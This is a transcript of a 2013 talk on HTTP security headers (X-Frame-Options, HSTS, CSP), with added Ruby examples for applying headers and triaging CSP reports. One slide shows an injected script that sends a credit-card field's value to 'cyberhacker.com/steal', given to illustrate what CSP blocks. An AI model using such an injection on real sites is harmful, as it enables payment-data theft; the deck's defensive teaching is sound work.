Security headers

Goes over headers like X-Frame-Options, Content Security Policy, HSTS, and more, as well as a library that makes applying them to Rails apps very simple.

Neil Matatall

March 16, 2013

Transcript

1. @ocrails | @ndm — @ocrails, January 30, 2013. Not your typical Rails security talk: header use @ Twitter.

2. @ocrails | @ndm — OK, but what are browser headers? Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ== / Accept: text/plain / Content-Type: application/x-www-form-urlencoded / User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0

3. @ocrails | @ndm — Do you use these? Content Security Policy, X-Frame-Options, HTTP Strict Transport Security, X-Xss-Protection, X-Content-Type-Options.

4. @ocrails | @ndm — X-Content-Type-Options: fixes MIME sniffing attacks. Only applies to IE, because only IE would do something like this. X-Content-Type-Options: nosniff. zzzzZZZZZZzzzzz

5. @ocrails | @ndm — X-Xss-Protection: use the browser's built-in XSS Auditor. X-Xss-Protection: [0-1](; mode=block)? For example, X-Xss-Protection: 1; mode=block (SCREENSHOT OF BLOCKED SCRIPT). zzzzZZZ... huh? zzzzzzzz
6. @ocrails | @ndm — X-Frame-Options: protects you from most classes of clickjacking. X-Frame-Options: DENY / X-Frame-Options: SAMEORIGIN / X-Frame-Options: ALLOW-FROM example.com. zzz... oh hey, that's cool. Don't frame my stuff.

7. @ocrails | @ndm — Firesheep / SSL Strip: Given I haven't received an HSTS header, And I have a session, When I visit http://example.com, Then I am pwned.

8. @ocrails | @ndm — Other SSL fails: posting passwords over HTTP; loading mixed content; using protocol-relative URLs.

9. @ocrails | @ndm — How hard is it to use? Base case: Strict-Transport-Security: max-age=10000000. Do all of your subdomains support SSL? Then Strict-Transport-Security: max-age=10000000; includeSubdomains (SSL FOR DUMMIES PICTURE)
10. @ocrails | @ndm — Content secur-a-wat? Content Security Policy is reshaping the security model. It is a complicated spec with great differences across browsers, and it is not widely adopted. However, it completely eliminates reflected and stored XSS, it ensures that you never load mixed content, it can protect users with infected browsers, and it allows you to accept arbitrary HTML code from users.

11. @ocrails | @ndm — Wat? Sounds cool. x-webkit-csp directives: script-src, style-src, img-src, default-src, frame-src, connect-src, font-src, media-src, object-src, report-uri.

12. @ocrails | @ndm — Get rid of XSS, eh? A script-src directive that doesn't contain 'unsafe-inline' almost eliminates most forms of cross-site scripting. I WILL NOT WRITE INLINE JAVASCRIPT. I WILL NOT WRITE INLINE JAVASCRIPT. I WILL NOT WRITE INLINE JAVASCRIPT. I WILL NOT WRITE INLINE JAVASCRIPT. I WILL NOT WRITE INLINE JAVASCRIPT. I WILL NOT WRITE INLINE JAVASCRIPT. I WILL NOT WRITE INLINE JAVASCRIPT.

13. @owaspoc Jan 2013 @ndm | @presidentbeef — But I have to... OK, then I'll inject: <script> var image = new Image(); image.src = "cyberhacker.com/steal?data=" + $('#credit_card').val(); </script> FALSE! img-src violation, no XHR allowed.
14. @ocrails | @ndm — How to apply? Secure headers! Open sourced earlier this month: https://github.com/twitter/secureheaders

15. @ocrails | @ndm — How does it work? It sets a before_filter that applies each header. Values are based on options passed to the filter, or set in an initializer. Easily overridden. Secure by default!!!

16. @ocrails | @ndm — What about that security policy thingy? There are > 6 differences between these two header values.

17. @ocrails | @ndm — Other features: set separate policies for http/https; auto-fill chrome-extension: (becoming part of the spec); auto-fill missing directives with the default value (becoming part of the spec).
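An added example, not code from the deck or from the secureheaders gem: a Rack-style middleware that applies the headers from slides 4 to 9 the way slides 15 and 17 describe the gem doing it, with secure defaults that a response can override, HSTS sent only on HTTPS responses, separate CSP policies for http and https, and missing CSP directives filled from default-src. The module, class and option names (HeaderDemo, Middleware, build_csp, hsts:, csp_https:, csp_http:, report_uri:, report_only:) are this example's own, the standard Content-Security-Policy header name is used in place of the x-webkit-csp prefix on slide 11, and the request is a constructed Rack env hash rather than a real Rails request.

```ruby
# Added example, not the secureheaders gem's code: Rack-style middleware that
# applies the deck's headers with secure defaults, plus a CSP builder that
# fills missing directives from default-src. All names are this example's own.
module HeaderDemo
  # Fetch directives the builder emits, in a stable order.
  CSP_DIRECTIVES = %w[default-src script-src style-src img-src frame-src
                      connect-src font-src media-src object-src].freeze

  # Turn { 'default-src' => "'self'", 'script-src' => "'self' https://cdn.example.com" }
  # into a header value. With fill_missing, every directive absent from the hash
  # is copied from default-src, so a browser that does not fall back to
  # default-src enforces the same policy as one that does.
  def self.build_csp(policy, fill_missing: true, report_uri: nil)
    policy = policy.transform_keys(&:to_s)
    default = policy.fetch('default-src', "'self'")
    parts = ["default-src #{default}"]
    (CSP_DIRECTIVES - ['default-src']).each do |directive|
      value = policy[directive] || (fill_missing ? default : nil)
      parts << "#{directive} #{value}" if value
    end
    parts << "report-uri #{report_uri}" if report_uri
    parts.join('; ')
  end

  class Middleware
    # Fixed-value headers, set only when the app has not chosen its own value.
    DEFAULTS = {
      'X-Frame-Options'        => 'SAMEORIGIN',
      'X-Content-Type-Options' => 'nosniff',
      'X-XSS-Protection'       => '1; mode=block'
    }.freeze

    # hsts: { max_age:, include_subdomains: } or false; csp_https / csp_http: policy
    # hashes per scheme; report_only: send the Report-Only header while experimenting.
    def initialize(app, hsts: { max_age: 10_000_000, include_subdomains: false },
                   csp_https: { 'default-src' => "'self'" }, csp_http: nil,
                   report_uri: nil, report_only: false)
      @app = app
      @hsts = hsts
      @csp_https = csp_https
      @csp_http = csp_http
      @report_uri = report_uri
      @report_only = report_only
    end

    def call(env)
      status, headers, body = @app.call(env)
      https = env['rack.url_scheme'] == 'https'

      DEFAULTS.each { |name, value| headers[name] ||= value }

      # Browsers only honour HSTS on an HTTPS response, so it is not sent over HTTP.
      if https && @hsts
        value = "max-age=#{@hsts[:max_age]}"
        value += '; includeSubDomains' if @hsts[:include_subdomains]
        headers['Strict-Transport-Security'] ||= value
      end

      # Separate policies for http and https; the http policy falls back to the https one.
      policy = https ? @csp_https : (@csp_http || @csp_https)
      if policy
        name = @report_only ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy'
        headers[name] ||= HeaderDemo.build_csp(policy, report_uri: @report_uri)
      end

      [status, headers, body]
    end
  end

  # Run the middleware over a constructed request and return the response headers.
  def self.demo(scheme: 'https', app_headers: {})
    app = ->(_env) { [200, app_headers.dup, ['ok']] }
    mw = Middleware.new(app,
                        hsts: { max_age: 10_000_000, include_subdomains: true },
                        csp_https: { 'default-src' => "'self'",
                                     'script-src' => "'self' https://cdn.example.com" },
                        report_uri: '/csp_report')
    _status, headers, _body = mw.call('rack.url_scheme' => scheme)
    headers
  end
end

if $PROGRAM_NAME == __FILE__
  HeaderDemo.demo.each { |name, value| puts "#{name}: #{value}" }
end
```

Running the file prints the headers for a constructed HTTPS response; calling `HeaderDemo.demo(scheme: 'http')` shows the same response without Strict-Transport-Security, and passing `app_headers: { 'X-Frame-Options' => 'DENY' }` shows the app's stricter value winning over the default.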
18. @ocrails | @ndm — What does the report look like?
    {"csp-report" => {"document-uri" => "http://localhost:3000/home", "referrer" => "", "blocked-uri" => "ws://localhost:35729/livereload", "violated-directive" => "xhr-src ws://localhost.twitter.com:*"}}

19. @ocrails | @ndm — Quiz: what does this report indicate?
    {"csp-report" => {"document-uri" => "http://example.com/welcome", "referrer" => "", "blocked-uri" => "self", "violated-directive" => "inline script base restriction", "source-file" => "http://example.com/welcome", "script-sample" => "alert(1)", "line-number" => 81}}
20. @ocrails | @ndm — Header gem to the rescue: it forwards CSP reports for Firefox, and it makes setting an enforce mode and a report-only mode easy for experimentation.
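An added example, not code from the deck or the gem, for reading the report bodies shown on slides 18 and 19 once a report-only policy starts producing them: it parses one report into a triage category (an inline script on the page itself, a blocked external resource, or noise injected by a browser extension) and summarises a batch by category and external host. The module and method names (CspTriage, triage, summarize) are this example's own; the first two sample reports are the ones from the deck, the third is constructed.

```ruby
# Added example, not the deck's or the gem's code: triage CSP violation reports.
require 'json'
require 'uri'

module CspTriage
  # Schemes that mean the user's own browser extension, not our page, triggered the report.
  NOISE_SCHEMES = %w[chrome-extension moz-extension safari-extension about].freeze

  # Parse one report body (the JSON a browser POSTs to report-uri) into a category
  # plus the fields a responder wants at a glance.
  def self.triage(body)
    r = JSON.parse(body).fetch('csp-report')
    blocked = r['blocked-uri'].to_s
    directive = r['violated-directive'].to_s
    category =
      if NOISE_SCHEMES.any? { |s| blocked.start_with?("#{s}:") }
        :extension_noise
      elsif blocked == 'self' && directive.include?('inline')
        :inline_script   # inline script on our own page: our code, or something injected into it
      elsif blocked.empty? || blocked == 'self'
        :same_origin
      else
        :external_resource
      end
    { category: category, directive: directive, blocked: blocked,
      page: r['document-uri'], sample: r['script-sample'], line: r['line-number'] }
  end

  # Summarise a batch of reports: counts per category and the external hosts seen,
  # which is what to look at first when a new policy is running report-only.
  def self.summarize(bodies)
    triaged = bodies.map { |b| triage(b) }
    counts = triaged.group_by { |t| t[:category] }.transform_values(&:size)
    hosts = triaged.select { |t| t[:category] == :external_resource }
                   .map { |t| URI.parse(t[:blocked]).host rescue t[:blocked] }
                   .uniq
    { counts: counts, external_hosts: hosts }
  end

  # Sample bodies: the first two are the reports shown in the deck, the third is constructed.
  SAMPLES = [
    { 'csp-report' => { 'document-uri' => 'http://localhost:3000/home', 'referrer' => '',
                        'blocked-uri' => 'ws://localhost:35729/livereload',
                        'violated-directive' => 'xhr-src ws://localhost.twitter.com:*' } },
    { 'csp-report' => { 'document-uri' => 'http://example.com/welcome', 'referrer' => '',
                        'blocked-uri' => 'self',
                        'violated-directive' => 'inline script base restriction',
                        'source-file' => 'http://example.com/welcome',
                        'script-sample' => 'alert(1)', 'line-number' => 81 } },
    { 'csp-report' => { 'document-uri' => 'http://example.com/welcome', 'referrer' => '',
                        'blocked-uri' => 'chrome-extension://constructed-id/inject.js',
                        'violated-directive' => 'script-src' } }
  ].map(&:to_json).freeze
end

if $PROGRAM_NAME == __FILE__
  CspTriage::SAMPLES.each { |body| p CspTriage.triage(body) }
  p CspTriage.summarize(CspTriage::SAMPLES)
end
```

The inline-script category is the one worth a human look: the script-sample and line-number fields tell you whether it is your own template that still carries inline JavaScript or content that arrived in the page some other way, while the extension noise can be dropped before it reaches anyone's inbox.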
21. @owaspoc Jan 2013 @ndm | @presidentbeef — CSP, Brakeman, ThreatDeck, Phantom Gang, Roshambo, Email developers, Email security.